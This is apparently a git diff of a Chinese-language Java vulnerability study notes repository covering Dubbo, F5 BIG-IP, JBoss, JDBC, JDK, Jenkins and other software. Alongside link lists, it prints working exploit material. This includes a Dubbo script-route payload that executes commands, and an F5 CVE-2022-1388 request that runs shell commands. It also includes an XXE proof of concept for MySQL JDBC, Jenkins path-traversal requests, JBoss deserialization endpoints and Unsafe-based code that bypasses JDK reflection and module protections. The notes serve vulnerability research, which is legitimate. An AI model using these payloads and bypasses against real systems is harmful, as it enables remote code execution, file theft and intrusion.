+script%3A%2F%2F127.0.0.1%2Fcom.threedr3am.learn.server.boot.DemoService%3Fapplication%3Ddubbo-consumer%26category%3Drouters%26check%3Dfalse%26dubbo%3D2.0.2%26init%3Dfalse%26interface%3Dcom.threedr3am.learn.server.boot.DemoService%26metadata-type%3Dremote%26methods%3Dhello%26pid%3D53953%26qos.enable%3Dfalse%26release%3D2.7.7%26revision%3D1.0%26side%3Dconsumer%26sticky%3Dfalse%26timestamp%3D1622381389749%26version%3D1.0%26route%3Dscript%26type%3Djavascript%26rule%3Ds%253D%255B3%255D%253Bs%255B0%255D%253D'%252Fbin%252Fbash'%253Bs%255B1%255D%253D'-c'%253Bs%255B2%255D%253D'open%2520-a%2520calculator'%253Bjava.lang.Runtime.getRuntime().exec(s)%253B +``` + +### Dubbo反序列化RCE利用之新拓展面 - Dubbo Rouge攻击客户端 + +https://xz.aliyun.com/t/7354 + +**文章中有一点非常强** +![image](https://user-images.githubusercontent.com/63966847/139078049-28694796-bb21-40fe-9e8d-38d96da29ab8.png) + +在一次看了threedr3am师傅的文章太精彩了,简单的说就是通过注册中心上注册恶意rpc服务并且设置序列化为java原生序列化,等待客户端去连接。 +也就是**rouge**,中文名称叫胭脂,hhh 有点美人计的味道了。 + +### CVE-2021-43297 + +https://paper.seebug.org/1814/ + +### Dubbo 2.7.8多个远程代码执行漏洞 + +https://xz.aliyun.com/t/8917 + +### CVE-2021-36162 + +[Apache Dubbo CVE-2021-36162 挖掘过程 +](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247487450&idx=1&sn=895a573a105cff858990df8bb88aafc5&chksm=c187cfcbf6f046ddbe75a826d851ebeafbcc7449e728a6be0e3ad60279ae7689ef14d4181757&mpshare=1&scene=23&srcid=0323KHKv3qtNyGs5a4jlCoz5&sharer_sharetime=1648033016703&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) diff --git a/F5 big/Readme.md b/F5 big/Readme.md new file mode 100644 index 0000000..cfc206f --- /dev/null +++ b/F5 big/Readme.md @@ -0,0 +1,28 @@ +# F5 big + +F5 Networks K52145254:TMUI RCE 漏洞 CVE-2020-5902 ++ [HSQLDB反序列化](https://buaq.net/go-84779.html) + + +F5 BIGIP iControl REST CVE-2021-22986 ++ [脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用](https://mp.weixin.qq.com/s/cavKq04hNU5pJoTBiPMZkw) ++ [F5 BIGIP iControl REST CVE-2021-22986漏洞分析与利用](https://www.anquanke.com/post/id/236159) ++ [F5 BIG-IP Cookie 信息泄露利用工具](https://mp.weixin.qq.com/s/RzYSA1ADrIQYQxqjug62sg) ++ [漏洞复现-F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)](https://mp.weixin.qq.com/s/CDST3_FcVM8tvB0hTlrsJg) + +CVE-2022-1388 ++ [BIG-IP(CVE-2022-1388)从修复方案分析出exp](https://mp.weixin.qq.com/s/6gVZVRSDRmeGcNYjTldw1Q) +``` +POST /mgmt/tm/util/bash HTTP/1.1 +Host: +Connection: keep-alive, X-F5-Auth-Token +Authorization: Basic YWRtaW46QVNhc1M= +Content-Length: 45 + +{ +"command":"run", +"utilCmdArgs":"-c id" +} +``` ++ [CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现](https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw) ++ [CVE-2022-1388:扩展攻击之文件写入](https://mp.weixin.qq.com/s?__biz=MzkwMzM2NDE5OQ==&mid=2247483731&idx=1&sn=6ac2832719258adbbcf718984558d2cb&chksm=c0962a5bf7e1a34daeb3cfbd92b3de27718aa372374b022e5d7f0ab0923e585012d7be7c429d&scene=132#wechat_redirect) **写入的地址/usr/local/www/** diff --git a/JNI/Readme.md b/JNI/Readme.md new file mode 100644 index 0000000..167b0db --- /dev/null +++ b/JNI/Readme.md @@ -0,0 +1,3 @@ +# JNI + +**通过System.load(path) 去加载dll文件不要求后缀名,可以为任意的后缀名,只有能找到路径。** diff --git a/JVM/Readme.md b/JVM/Readme.md new file mode 100644 index 0000000..5c66caf --- /dev/null +++ b/JVM/Readme.md @@ -0,0 +1,5 @@ +# JVM + +>自己在学习jvm这本书会记录其中的知识点. + ++ [通过实例一行一行分析JVM的invokespecial和invokevirtual指令](http://wxweven.win/2017/09/15/JVM-invokespecial%E5%92%8Cinvokevirtual/) diff --git a/Jboss/README.md b/Jboss/README.md index 0a7263d..6e56210 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -1,6 +1,508 @@ -## jboss介绍: +# jboss介绍: JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开放源代码/114160)的[应用服务器](https://baike.baidu.com/item/应用服务器/4971773)。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 自己测试了网上很多工具发现不是特别好用 而且不集中。。。。 所以自己想写一个综合利用的工具。。。 + ++ [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) + +## 反序列化漏洞 +bypass 请求方式是HEAD + +**endpoint** +``` +/invoker/readonly 是一个filter 请求方法随便并且url后面可以加其他的 +/invoker/EJBInvokerServlet +/invoker/JMXInvokerServlet +/invoker/readonly/JMXInvokerServlet +/invoker/restricted/JMXInvokerServlet +``` +http-invoker.sar 组件的问题 + +web.xml + +```xml + + + + + + + ReadOnlyAccessFilter + org.jboss.invocation.http.servlet.ReadOnlyAccessFilter + + readOnlyContext + readonly + The top level JNDI context the filter will enforce + read-only access on. If specified only Context.lookup operations + will be allowed on this context. Another other operations or lookups + on any other context will fail. Do not associate this filter with the + JMXInvokerServlets if you want unrestricted access. + + + + invokerName + jboss:service=NamingBeanImpl + The JMX ObjectName of the naming service mbean + + + + + + ReadOnlyAccessFilter + /readonly/* + + + + + EJBInvokerServlet + The EJBInvokerServlet receives posts containing serlized + MarshalledInvocation objects that are routed to the EJB invoker given by + the invokerName init-param. The return content is a serialized + MarshalledValue containg the return value of the inovocation, or any + exception that may have been thrown. + + org.jboss.invocation.http.servlet.InvokerServlet + + invokerName + jboss:service=invoker,type=http + The RMI/HTTP EJB compatible invoker + + 1 + + + JMXInvokerServlet + The JMXInvokerServlet receives posts containing serlized + MarshalledInvocation objects that are routed to the invoker given by + the the MBean whose object name hash is specified by the + invocation.getObjectName() value. The return content is a serialized + MarshalledValue containg the return value of the inovocation, or any + exception that may have been thrown. + + org.jboss.invocation.http.servlet.InvokerServlet + 1 + + + + JNDIFactory + A servlet that exposes the JBoss JNDI Naming service stub + through http. The return content is a serialized + MarshalledValue containg the org.jnp.interfaces.Naming stub. This + configuration handles requests for the standard JNDI naming service. + + org.jboss.invocation.http.servlet.NamingFactoryServlet + + namingProxyMBean + jboss:service=invoker,type=http,target=Naming + + + proxyAttribute + Proxy + + 2 + + + + ReadOnlyJNDIFactory + A servlet that exposes the JBoss JNDI Naming service stub + through http, but only for a single read-only context. The return content + is a serialized MarshalledValue containg the org.jnp.interfaces.Naming + stub. + + org.jboss.invocation.http.servlet.NamingFactoryServlet + + namingProxyMBean + jboss:service=invoker,type=http,target=Naming,readonly=true + + + proxyAttribute + Proxy + + 2 + + + + + JNDIFactory + /JNDIFactory/* + + + + ReadOnlyJNDIFactory + /ReadOnlyJNDIFactory/* + + + EJBInvokerServlet + /EJBInvokerServlet/* + + + JMXInvokerServlet + /JMXInvokerServlet/* + + + + JMXInvokerServlet + /readonly/JMXInvokerServlet/* + + + + + JNDIFactory + /restricted/JNDIFactory/* + + + JMXInvokerServlet + /restricted/JMXInvokerServlet/* + + + + + + HttpInvokers + An example security config that only allows users with the + role HttpInvoker to access the HTTP invoker servlets + + /restricted/* + GET + POST + + + HttpInvoker + + + + BASIC + JBoss HTTP Invoker + + + + HttpInvoker + + +``` +org.jboss.invocation.http.servlet.ReadOnlyAccessFilter +```java +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by FernFlower decompiler) +// + +package org.jboss.invocation.http.servlet; + +import java.io.IOException; +import java.io.ObjectInputStream; +import java.lang.reflect.Method; +import java.security.Principal; +import java.util.Map; +import javax.management.MBeanServer; +import javax.management.ObjectName; +import javax.servlet.Filter; +import javax.servlet.FilterChain; +import javax.servlet.FilterConfig; +import javax.servlet.ServletException; +import javax.servlet.ServletInputStream; +import javax.servlet.ServletRequest; +import javax.servlet.ServletResponse; +import javax.servlet.http.HttpServletRequest; +import org.jboss.invocation.MarshalledInvocation; +import org.jboss.logging.Logger; +import org.jboss.mx.util.MBeanServerLocator; + +public class ReadOnlyAccessFilter implements Filter { + private static Logger log = Logger.getLogger(ReadOnlyAccessFilter.class); + private FilterConfig filterConfig = null; + private String readOnlyContext; + private Map namingMethodMap; + + public ReadOnlyAccessFilter() { + } + + public void init(FilterConfig filterConfig) throws ServletException { + this.filterConfig = filterConfig; + if (filterConfig != null) { + this.readOnlyContext = filterConfig.getInitParameter("readOnlyContext"); + String invokerName = filterConfig.getInitParameter("invokerName"); + + try { + MBeanServer mbeanServer = MBeanServerLocator.locateJBoss(); + ObjectName mbean = new ObjectName(invokerName); + this.namingMethodMap = (Map)mbeanServer.getAttribute(mbean, "MethodMap"); + } catch (Exception var5) { + log.error("Failed to init ReadOnlyAccessFilter", var5); + throw new ServletException("Failed to init ReadOnlyAccessFilter", var5); + } + } + + } + + public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { + HttpServletRequest httpRequest = (HttpServletRequest)request; + Principal user = httpRequest.getUserPrincipal(); + if (user == null && this.readOnlyContext != null) { + ServletInputStream sis = request.getInputStream(); + ObjectInputStream ois = new ObjectInputStream(sis); + MarshalledInvocation mi = null; + + try { + mi = (MarshalledInvocation)ois.readObject(); + } catch (ClassNotFoundException var10) { + throw new ServletException("Failed to read MarshalledInvocation", var10); + } + + request.setAttribute("MarshalledInvocation", mi); + mi.setMethodMap(this.namingMethodMap); + Method m = mi.getMethod(); + if (m != null) { + this.validateAccess(m, mi); + } + } + + chain.doFilter(request, response); + } + + public void destroy() { + } + + public String toString() { + if (this.filterConfig == null) { + return "NamingAccessFilter()"; + } else { + StringBuffer sb = new StringBuffer("NamingAccessFilter("); + sb.append(this.filterConfig); + sb.append(")"); + return sb.toString(); + } + } + + private void validateAccess(Method m, MarshalledInvocation mi) throws ServletException { + boolean trace = log.isTraceEnabled(); + if (trace) { + log.trace("Checking against readOnlyContext: " + this.readOnlyContext); + } + + String methodName = m.getName(); + if (!methodName.equals("lookup")) { + throw new ServletException("Only lookups against " + this.readOnlyContext + " are allowed"); + } else { + Object[] args = mi.getArguments(); + Object arg = args.length > 0 ? args[0] : ""; + String name; + if (arg instanceof String) { + name = (String)arg; + } else { + name = arg.toString(); + } + + if (trace) { + log.trace("Checking lookup(" + name + ") against: " + this.readOnlyContext); + } + + if (!name.startsWith(this.readOnlyContext)) { + throw new ServletException("Lookup(" + name + ") is not under: " + this.readOnlyContext); + } + } + } +} +``` +org.jboss.invocation.http.servlet.InvokerServlet +```java +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by FernFlower decompiler) +// + +package org.jboss.invocation.http.servlet; + +import java.io.IOException; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.InvocationTargetException; +import java.security.AccessController; +import java.security.Principal; +import java.security.PrivilegedAction; +import javax.management.MBeanServer; +import javax.management.MalformedObjectNameException; +import javax.management.ObjectName; +import javax.servlet.ServletConfig; +import javax.servlet.ServletException; +import javax.servlet.ServletInputStream; +import javax.servlet.ServletOutputStream; +import javax.servlet.http.HttpServlet; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.jboss.invocation.InvocationException; +import org.jboss.invocation.MarshalledInvocation; +import org.jboss.invocation.MarshalledValue; +import org.jboss.logging.Logger; +import org.jboss.mx.util.JMXExceptionDecoder; +import org.jboss.mx.util.MBeanServerLocator; +import org.jboss.security.SecurityAssociation; +import org.jboss.system.Registry; + +public class InvokerServlet extends HttpServlet { + private static Logger log = Logger.getLogger(InvokerServlet.class); + private static String REQUEST_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"; + private static String RESPONSE_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"; + private MBeanServer mbeanServer; + private ObjectName localInvokerName; + + public InvokerServlet() { + } + + public void init(ServletConfig config) throws ServletException { + super.init(config); + + try { + String name = config.getInitParameter("invokerName"); + if (name != null) { + this.localInvokerName = new ObjectName(name); + log.debug("localInvokerName=" + this.localInvokerName); + } + } catch (MalformedObjectNameException var3) { + throw new ServletException("Failed to build invokerName", var3); + } + + this.mbeanServer = MBeanServerLocator.locateJBoss(); + if (this.mbeanServer == null) { + throw new ServletException("Failed to locate the MBeanServer"); + } + } + + public void destroy() { + } + + protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + boolean trace = log.isTraceEnabled(); + if (trace) { + log.trace("processRequest, ContentLength: " + request.getContentLength()); + log.trace("processRequest, ContentType: " + request.getContentType()); + } + + Boolean returnValueAsAttribute = (Boolean)request.getAttribute("returnValueAsAttribute"); + + try { + response.setContentType(RESPONSE_CONTENT_TYPE); + MarshalledInvocation mi = (MarshalledInvocation)request.getAttribute("MarshalledInvocation"); + if (mi == null) { + ServletInputStream sis = request.getInputStream(); + ObjectInputStream ois = new ObjectInputStream(sis); + mi = (MarshalledInvocation)ois.readObject(); + ois.close(); + } + + if (mi.getPrincipal() == null && mi.getCredential() == null) { + mi.setPrincipal(InvokerServlet.GetPrincipalAction.getPrincipal()); + mi.setCredential(InvokerServlet.GetCredentialAction.getCredential()); + } + + Object[] params = new Object[]{mi}; + String[] sig = new String[]{"org.jboss.invocation.Invocation"}; + ObjectName invokerName = this.localInvokerName; + if (invokerName == null) { + Integer nameHash = (Integer)mi.getObjectName(); + invokerName = (ObjectName)Registry.lookup(nameHash); + if (invokerName == null) { + throw new ServletException("Failed to find invoker name for hash(" + nameHash + ")"); + } + } + + Object value = this.mbeanServer.invoke(invokerName, "invoke", params, sig); + if (returnValueAsAttribute != null && returnValueAsAttribute) { + request.setAttribute("returnValue", value); + } else { + MarshalledValue mv = new MarshalledValue(value); + ServletOutputStream sos = response.getOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(sos); + oos.writeObject(mv); + oos.close(); + } + } catch (Throwable var13) { + Throwable t = JMXExceptionDecoder.decode(var13); + if (t instanceof InvocationTargetException) { + InvocationTargetException ite = (InvocationTargetException)t; + t = ite.getTargetException(); + } + + InvocationException appException = new InvocationException(t); + if (returnValueAsAttribute != null && returnValueAsAttribute) { + log.debug("Invoke threw exception", t); + request.setAttribute("returnValue", appException); + } else if (response.isCommitted()) { + log.error("Invoke threw exception, and response is already committed", t); + } else { + response.resetBuffer(); + MarshalledValue mv = new MarshalledValue(appException); + ServletOutputStream sos = response.getOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(sos); + oos.writeObject(mv); + oos.close(); + } + } + + } + + protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + this.processRequest(request, response); + } + + protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + this.processRequest(request, response); + } + + public String getServletInfo() { + return "An HTTP to JMX invocation servlet"; + } + + private static class GetCredentialAction implements PrivilegedAction { + static PrivilegedAction ACTION = new InvokerServlet.GetCredentialAction(); + + private GetCredentialAction() { + } + + public Object run() { + Object credential = SecurityAssociation.getCredential(); + return credential; + } + + static Object getCredential() { + Object credential = AccessController.doPrivileged(ACTION); + return credential; + } + } + + private static class GetPrincipalAction implements PrivilegedAction { + static PrivilegedAction ACTION = new InvokerServlet.GetPrincipalAction(); + + private GetPrincipalAction() { + } + + public Object run() { + Principal principal = SecurityAssociation.getPrincipal(); + return principal; + } + + static Principal getPrincipal() { + Principal principal = (Principal)AccessController.doPrivileged(ACTION); + return principal; + } + } +} +``` diff --git a/Jdbc/CVE-2021-2471/Readme.md b/Jdbc/CVE-2021-2471/Readme.md new file mode 100644 index 0000000..a37a405 --- /dev/null +++ b/Jdbc/CVE-2021-2471/Readme.md @@ -0,0 +1,90 @@ +# CVE-2021-2471 + +By Firebasky + +>昨天晚上看twitter,发现jdbc出现了一个xxe漏洞,比较感兴趣,阿里给了介绍但是没有给exp。 +> +>https://mp.weixin.qq.com/s/erIFMiPNB2XSBJSqXyxuKg + +## 分析 + +文章中介绍了是`getSource`函数造成的原因,那我们就需要先找到这个函数的类。漏洞版本是MySQL JDBC 8.0.27版本之前。所以我们创建maven项目并且添加jdbc的组件。https://mvnrepository.com/artifact/mysql/mysql-connector-java/8.0.26 + +```xml + + + mysql + mysql-connector-java + 8.0.26 + +``` + +### 全局搜索 + +然后搜索getSource函数利用(全局搜索) + +![image-20211022135316052](img/image-20211022135316052.png) + +大概是这个在跟进他的实现。确实是这个。。 + +![image-20211022135425801](img/image-20211022135425801.png) + +### 对比发现漏洞 + +如果上面的方法感觉不好,那么可以对比来实现,因为文章中介绍了MySQL JDBC 8.0.27版本之前,说明MySQL JDBC 8.0.27就修复了漏洞,那我们下载MySQL JDBC 8.0.27和MySQL JDBC 8.0.26 来使用工具对比jar包看看不一样的地方是啥。 + +https://github.com/GraxCode/cafecompare + +![image-20211022140911655](img/image-20211022140911655.png) + + + +现在具体看看**com.mysql.cj.jdbc.getSource**函数 + +![d](img/image-20211022141357429.png) + +我们在看看**this.stringRep**怎么设置的 + +![image-20211022141453082](img/image-20211022141453082.png) + +然后现在去看看怎么调用这个**getSource**函数,就去看看他的接口 + +![image-20211022141712911](img/image-20211022141712911.png) + +那么现在问题就是创建一个SQLXML对象就欧克,就可以调用其getSource和setString方法。 + +https://www.docs4dev.com/docs/zh/java/java8/tutorials/jdbc-basics-sqlxml.html#creating_sqlxml + +![image-20211022142111106](img/image-20211022142111106.png) + +## exp + +```java +package CVE; + +import javax.xml.transform.dom.DOMSource; +import java.sql.Connection; +import java.sql.DriverManager; +import java.sql.SQLException; +import java.sql.SQLXML; + +public class CVE_2021_2471 { + public static void main(String[] args) throws SQLException { + String poc = "\n" + + "\n" + + "\n" + + "]>\n" + + "&sp;"; + Connection connection = DriverManager.getConnection("jdbc:mysql://127.0.0.1:3306/test", "root", "0210520"); + SQLXML sqlxml = connection.createSQLXML(); + sqlxml.setString(poc); + sqlxml.getSource(DOMSource.class);//为了绕过clazz.equals(DOMSource.class) + } +} +``` + +## 效果 + +![image-20211022142331574](img/image-20211022142331574.png) + diff --git a/Jdbc/CVE-2021-2471/img/image-20211022135316052.png b/Jdbc/CVE-2021-2471/img/image-20211022135316052.png new file mode 100644 index 0000000..e2d9f1d Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022135316052.png differ diff --git a/Jdbc/CVE-2021-2471/img/image-20211022135425801.png b/Jdbc/CVE-2021-2471/img/image-20211022135425801.png new file mode 100644 index 0000000..147258a Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022135425801.png differ diff --git a/Jdbc/CVE-2021-2471/img/image-20211022140911655.png b/Jdbc/CVE-2021-2471/img/image-20211022140911655.png new file mode 100644 index 0000000..bcf9502 Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022140911655.png differ diff --git a/Jdbc/CVE-2021-2471/img/image-20211022141357429.png b/Jdbc/CVE-2021-2471/img/image-20211022141357429.png new file mode 100644 index 0000000..7bae134 Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022141357429.png differ diff --git a/Jdbc/CVE-2021-2471/img/image-20211022141453082.png b/Jdbc/CVE-2021-2471/img/image-20211022141453082.png new file mode 100644 index 0000000..2bee66b Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022141453082.png differ diff --git a/Jdbc/CVE-2021-2471/img/image-20211022141712911.png b/Jdbc/CVE-2021-2471/img/image-20211022141712911.png new file mode 100644 index 0000000..c967890 Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022141712911.png differ diff --git a/Jdbc/CVE-2021-2471/img/image-20211022142111106.png b/Jdbc/CVE-2021-2471/img/image-20211022142111106.png new file mode 100644 index 0000000..44a3c5e Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022142111106.png differ diff --git a/Jdbc/CVE-2021-2471/img/image-20211022142331574.png b/Jdbc/CVE-2021-2471/img/image-20211022142331574.png new file mode 100644 index 0000000..0a8d3b0 Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022142331574.png differ diff --git a/Jdbc/Readme.md b/Jdbc/Readme.md index 23848a2..a9a133a 100644 --- a/Jdbc/Readme.md +++ b/Jdbc/Readme.md @@ -2,3 +2,8 @@ >JDBC(Java DataBase Connectivity)是Java和数据库之间的一个桥梁,是一个 规范 而不是一个实现,能够执行SQL语句。它由一组用Java语言编写的类和接口组成。各种不同类型的数据库都有相应的实现。 + MySQL JDBC 客户端反序列化漏洞[参考文章](https://xz.aliyun.com/t/8159) [自己调试的漏洞点](./img/1.png) [自己调试的漏洞点](./img/2.png)**J简单的说:在JDBC连接MySQL的过程中,执行了SHOW SESSION STATUS语句。而如果我们控制返回的结果是一个恶意的对象,jdbc就会去执行readobject方法反序列化,从而有入口点,在利用cc链,完美rce。** + +## 其他利用 +jdbc 利用方式太多了,慢慢学习(重学) + ++ [由CVE-2022-21724引申jdbc漏洞](https://mp.weixin.qq.com/s?__biz=MzUzNDMyNjI3Mg==&mid=2247485275&idx=1&sn=e06b07579ecef87f8cce4536d25789ce&chksm=fa973a34cde0b322ef3949c2cf7fc6bf31e945674d2fe313a3dbf63504bdf737f05cba65de18&mpshare=1&scene=23&srcid=0414XqOEScLh3JIaaHk9pp4v&sharer_sharetime=1649906865169&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) diff --git a/Jdk/Readme.md b/Jdk/Readme.md new file mode 100644 index 0000000..7c4acd2 --- /dev/null +++ b/Jdk/Readme.md @@ -0,0 +1,170 @@ +# JDK + +jdk>12不能反射修改下面class的成员。 +![image](https://user-images.githubusercontent.com/63966847/194300821-dd1bf0bc-b5bd-4680-aa35-49a5d4c8adb4.png) +思路是通过unsafe api去修改Reflection类的成员,赋值为null. +```java + +import sun.misc.Unsafe; +import java.io.ByteArrayOutputStream; +import java.io.InputStream; +import java.lang.reflect.Field; +import java.util.HashMap; + +public class bypass { + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } + public static byte[] readInputStream(InputStream inputStream) { + byte[] temp = new byte[4096]; + int readOneNum = 0; + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + try { + while ((readOneNum = inputStream.read(temp)) != -1) { + bos.write(temp, 0, readOneNum); + } + inputStream.close(); + }catch (Exception e){ + } + return bos.toByteArray(); + } + + public void bypassReflectionFilter()throws Exception{ + Unsafe unsafe = getUnsafe(); + Class reflectionClass=Class.forName("jdk.internal.reflect.Reflection"); + byte[] classBuffer = readInputStream(reflectionClass.getResourceAsStream("Reflection.class")); + //定义一个类,但不让类加载器知道它。 + Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null); + + Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap"); + //不需要 + //Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); + + if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){ + unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap()); + } + //if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ + // unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); + //} + } + public static void main(String[] args) throws Exception{ + //绕过Java 反射过滤获取ClassLoader私有字段 + //ClassLoader.class.getDeclaredField("parent");//在之前反射会报错 + new bypass().bypassReflectionFilter(); + ClassLoader.class.getDeclaredField("parent");//在之后反射可以bypass + } +} +``` +参考:https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +jdk>16 + +jdk17 bypass module + +https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/ + +https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +在jdk17使用反序列化的时候发现要报错 + +``` +InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed +``` + + +![image](https://user-images.githubusercontent.com/63966847/208854101-cfe0eee9-5882-4450-9d82-7092d353e30c.png) + +限制了 + +![image](https://user-images.githubusercontent.com/63966847/208854137-7c56007c-ac54-4490-8f30-2753cc0e52e3.png) + + +限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + +## 需要bypass + +``` +按照提案的说明,被严格限制的这些内部 API 包括: + +java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。 +sun.* 下的所有类及其成员都是内部 API。 +绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。 +``` + +**code** + +```java + +import sun.misc.Unsafe; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.ArrayList; + +/** + * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + */ +public class BypassModule { + public static void main(String[] args) throws Exception { + final ArrayList classes = new ArrayList<>(); + classes.add(Class.forName("java.lang.reflect.Field")); + classes.add(Class.forName("java.lang.reflect.Method")); + Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); + classes.add(aClass); + new BypassModule().bypassModule(classes); + aClass.newInstance(); + } + + public void bypassModule(ArrayList classes){ + try { + Unsafe unsafe = getUnsafe(); + Class currentClass = this.getClass(); + try { + Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]); + if (getModuleMethod != null) { + for (Class aClass : classes) { + Object targetModule = getModuleMethod.invoke(aClass, new Object[]{}); + unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule); + } + } + }catch (Exception e) { + } + }catch (Exception e){ + e.printStackTrace(); + } + } + + private static Method getMethod(Class clazz,String methodName,Class[] params) { + Method method = null; + while (clazz!=null){ + try { + method = clazz.getDeclaredMethod(methodName,params); + break; + }catch (NoSuchMethodException e){ + clazz = clazz.getSuperclass(); + } + } + return method; + } + + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } +} +``` + diff --git a/Jdk/dnsrebinding/Readme.md b/Jdk/dnsrebinding/Readme.md new file mode 100644 index 0000000..cf62f1a --- /dev/null +++ b/Jdk/dnsrebinding/Readme.md @@ -0,0 +1,13 @@ +# java rebinding + +http://www.loongten.com/2020/02/26/dns-rebinding-bypass + +http://www.lpnote.com/2018/11/23/java-dns-cache/ + +https://www.xmanblog.net/java-dns-rebinding-ssrf/ + +https://paper.seebug.org/390/ + +https://powerdns.org/hello-dns/ + +http://www.ruanyifeng.com/blog/2016/06/dns.html diff --git a/Jenkins/Readme.md b/Jenkins/Readme.md new file mode 100644 index 0000000..3dcfc1a --- /dev/null +++ b/Jenkins/Readme.md @@ -0,0 +1,23 @@ +# Jenkins + +## CVE-2018-1999002 +poc +``` +GET /plugin/credentials/.ini HTTP/1.1 +Host: +Accept-Language: ../../../../../../../../windows/win + +GET /plugin/credentials/.txt HTTP/1.1 +Host: +Accept-Language: ../../../../../../../../firebasky +``` + +[Jenkins 任意文件读取漏洞复现与分析-CVE-2018-1999002](https://chybeta.github.io/2018/08/07/Jenkins-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%86%E6%9E%90-%E3%80%90CVE-2018-1999002%E3%80%91/) + +linux 下利用难度大 必须找一个存在`_`的目录 + + + + +## 插件问题 xxe/xstream 反序列化 +https://github.com/Firebasky/ctf-Challenge/tree/main/2021_xyb_easyJenkins diff --git a/Jetty/Readme.md b/Jetty/Readme.md new file mode 100644 index 0000000..5405b5c --- /dev/null +++ b/Jetty/Readme.md @@ -0,0 +1,7 @@ +# Jetty + +好文章: + +https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ + +https://xz.aliyun.com/t/10039 diff --git a/MyBatis/Readme.md b/MyBatis/Readme.md new file mode 100644 index 0000000..473dddc --- /dev/null +++ b/MyBatis/Readme.md @@ -0,0 +1,3 @@ +# MyBatis + ++ [CVE-2020-26945 mybatis二级缓存反序列化的分析与复现](https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&mid=2247484196&idx=1&sn=735666b28cff6e6552d8f3e16b1be9a5&chksm=fa8b1ebccdfc97aa80b6103587fd418b63c6b0d290cd4229ccc999b3706fe4f325595049a7ce&mpshare=1&scene=23&srcid=1013pFDy9OUsVb24733hEAhA&sharer_sharetime=1602582161965&sharer_shareid=8a8448ee03016e30de742559b7359a01%23rd) 简单的说就是mybatis为了缓解多次查询而开启的缓存,如果可以修改缓存的内容就可以将其反序列化。[CVE-2020-26945漏洞](https://www.anquanke.com/post/id/219457) diff --git a/RASP/Readme.md 